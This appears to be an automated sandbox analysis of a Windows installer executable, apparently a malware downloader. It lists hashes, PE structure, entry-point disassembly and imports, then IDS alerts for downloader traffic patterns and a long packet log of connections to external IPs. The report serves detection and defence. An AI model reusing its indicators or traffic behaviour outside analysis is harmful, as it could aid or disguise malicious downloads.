                                                                                                                          SHA256:125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
                                                                                                                          SHA512:8a1deda7d7e8e80d8b2e62ad0d9d4400b1d865ea322955e577fc439a8a0f1d6d3cb912397ecb6458941fd7fd566c1fdbdf4c4ed02c72234fa543bfcb45db845a
                                                                                                                          SSDEEP:12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
                                                                                                                          TLSH:6C152356F79898FBE83A813064BEC932D660AC750561530733A6BF79983323E581F1CE
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
                                                                                                                          Icon Hash:4ccc524656d64e01
                                                                                                                          Entrypoint:0x40310f
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                                                          Instruction
                                                                                                                          sub esp, 00000184h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          xor ebx, ebx
                                                                                                                          push 00008001h
                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                          mov dword ptr [esp+10h], 00409198h
                                                                                                                          mov dword ptr [esp+20h], ebx
                                                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                                                          call dword ptr [004070A8h]
                                                                                                                          call dword ptr [004070A4h]
                                                                                                                          cmp ax, 00000006h
                                                                                                                          je 00007F4A2CBE1FA3h
                                                                                                                          push ebx
                                                                                                                          call 00007F4A2CBE4F11h
                                                                                                                          cmp eax, ebx
                                                                                                                          je 00007F4A2CBE1F99h
                                                                                                                          push 00000C00h
                                                                                                                          call eax
                                                                                                                          mov esi, 00407298h
                                                                                                                          push esi
                                                                                                                          call 00007F4A2CBE4E8Dh
                                                                                                                          push esi
                                                                                                                          call dword ptr [004070A0h]
                                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                                          cmp byte ptr [esi], bl
                                                                                                                          jne 00007F4A2CBE1F7Dh
                                                                                                                          push ebp
                                                                                                                          push 00000009h
                                                                                                                          call 00007F4A2CBE4EE4h
                                                                                                                          push 00000007h
                                                                                                                          call 00007F4A2CBE4EDDh
                                                                                                                          mov dword ptr [0042E404h], eax
                                                                                                                          call dword ptr [00407044h]
                                                                                                                          push ebx
                                                                                                                          call dword ptr [00407288h]
                                                                                                                          mov dword ptr [0042E4B8h], eax
                                                                                                                          push ebx
                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                          push 00000160h
                                                                                                                          push eax
                                                                                                                          push ebx
                                                                                                                          push 00428828h
                                                                                                                          call dword ptr [00407174h]
                                                                                                                          push 00409188h
                                                                                                                          push 0042DC00h
                                                                                                                          call 00007F4A2CBE4B07h
                                                                                                                          call dword ptr [0040709Ch]
                                                                                                                          mov ebp, 00434000h
                                                                                                                          push eax
                                                                                                                          push ebp
                                                                                                                          call 00007F4A2CBE4AF5h
                                                                                                                          push ebx
                                                                                                                          call dword ptr [00407154h]
                                                                                                                          Programming Language:
                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x1aa58.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x5fdd0x600038462d04cfdbc4943d18be461d53cc3eFalse0.6783854166666666data6.499697507009752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .ndata0x2f0000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x420000x1aa580x1ac00098718c0c5bf54afe6e125c2f1ac35baFalse0.23448452102803738data3.706045365348602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_BITMAP0x424600x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                          RT_ICON0x427c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.09021944871643203
                                                                                                                          RT_ICON0x52ff00x32f2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9443336911516639
                                                                                                                          RT_ICON0x562e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.16089211618257263
                                                                                                                          RT_ICON0x588900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.18738273921200752
                                                                                                                          RT_ICON0x599380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.31050106609808104
                                                                                                                          RT_ICON0x5a7e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.440884476534296
                                                                                                                          RT_ICON0x5b0880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5635838150289018
                                                                                                                          RT_ICON0x5b5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.2703900709219858
                                                                                                                          RT_ICON0x5ba580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.21908602150537634
                                                                                                                          RT_ICON0x5bd400x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.3716216216216216
                                                                                                                          RT_DIALOG0x5be680x144dataEnglishUnited States0.5216049382716049
                                                                                                                          RT_DIALOG0x5bfb00x13cdataEnglishUnited States0.5506329113924051
                                                                                                                          RT_DIALOG0x5c0f00x100dataEnglishUnited States0.5234375
                                                                                                                          RT_DIALOG0x5c1f00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                          RT_DIALOG0x5c3100xc4dataEnglishUnited States0.5918367346938775
                                                                                                                          RT_DIALOG0x5c3d80x60dataEnglishUnited States0.7291666666666666
                                                                                                                          RT_GROUP_ICON0x5c4380x92dataEnglishUnited States0.6575342465753424
                                                                                                                          RT_VERSION0x5c4d00x248dataEnglishUnited States0.5308219178082192
                                                                                                                          RT_MANIFEST0x5c7180x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                                                                          DLLImport
                                                                                                                          KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                                          USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                          ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-10-22T16:11:53.877008+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649987142.250.184.238443TCP
                                                                                                                          2024-10-22T16:11:53.895201+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649986142.250.184.238443TCP
                                                                                                                          2024-10-22T16:12:01.180935+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649990193.122.6.16880TCP
                                                                                                                          2024-10-22T16:12:04.537983+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649991193.122.6.16880TCP
                                                                                                                          2024-10-22T16:12:04.725700+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649990193.122.6.16880TCP
                                                                                                                          2024-10-22T16:12:05.444916+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649993188.114.97.3443TCP
                                                                                                                          2024-10-22T16:12:06.084842+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649991193.122.6.16880TCP
                                                                                                                          2024-10-22T16:12:06.475477+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649995193.122.6.16880TCP
                                                                                                                          2024-10-22T16:12:06.804302+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649996188.114.97.3443TCP
                                                                                                                          2024-10-22T16:12:07.709864+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649998193.122.6.16880TCP
                                                                                                                          2024-10-22T16:12:08.100608+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649999193.122.6.16880TCP
                                                                                                                          2024-10-22T16:12:17.408699+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650021188.114.97.3443TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 22, 2024 16:11:52.572396040 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:52.572513103 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:52.572616100 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:52.573498964 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:52.573538065 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:52.573597908 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:52.591417074 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:52.591449022 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:52.591792107 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:52.591861010 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.447166920 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.447242975 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.447985888 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.448044062 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.452596903 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.452713013 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.455280066 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.455353975 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.513076067 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.513098955 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.513458967 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.513525009 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.516206980 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.531852007 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.531883955 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.532166958 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.532804966 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.534248114 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.563323021 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.579336882 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.876921892 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.877141953 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.877516031 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.877552986 CEST44349987142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.877641916 CEST49987443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.895231962 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.895385027 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.895416021 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.895493984 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.895668030 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.895762920 CEST44349986142.250.184.238192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.895848989 CEST49986443192.168.2.6142.250.184.238
                                                                                                                          Oct 22, 2024 16:11:53.916913033 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:53.916944981 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.917180061 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:53.917387962 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:53.917401075 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.942748070 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:53.942790031 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:53.942945004 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:53.943155050 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:53.943171024 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.775599003 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.776058912 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.779638052 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.779649973 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.779968023 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.780073881 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.780446053 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.793473005 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.793806076 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.797177076 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.797194004 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.797460079 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.797600031 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.798043013 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:54.823369980 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:54.839337111 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.237399101 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.237477064 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.245671988 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.245734930 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.357106924 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.357184887 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.357208014 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.357249975 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.357258081 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.357300043 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.357840061 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.357888937 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.357949018 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.357990026 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.361977100 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.362024069 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.362283945 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.362332106 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.370964050 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.371017933 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.371045113 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.371082067 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.472426891 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.472501040 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.472524881 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.472573042 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.472574949 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.472587109 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.472619057 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.472659111 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.472739935 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.472831011 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.472837925 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.472884893 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.472893000 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.472944975 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.477613926 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.477730036 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.477744102 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.477945089 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.486049891 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.486104965 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.486119032 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.486166954 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.486277103 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.486325979 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.587641001 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.587730885 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.587769032 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.587773085 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.587769032 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.587790966 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.587830067 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.588252068 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.588295937 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.588376999 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.588416100 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.592962980 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.593414068 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.593426943 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.593472958 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.603127003 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.603182077 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.603193045 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.603231907 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.645653009 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.645721912 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.702960014 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703042030 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703048944 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703063011 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703098059 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703118086 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703125954 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703165054 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703217030 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703257084 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.704077005 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.704139948 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.704148054 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.704159021 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.704179049 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.704206944 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.708273888 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.708327055 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.708338022 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.708384991 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.717863083 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.717928886 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.717943907 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.717983961 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.761143923 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.761215925 CEST49988443192.168.2.6142.250.185.65
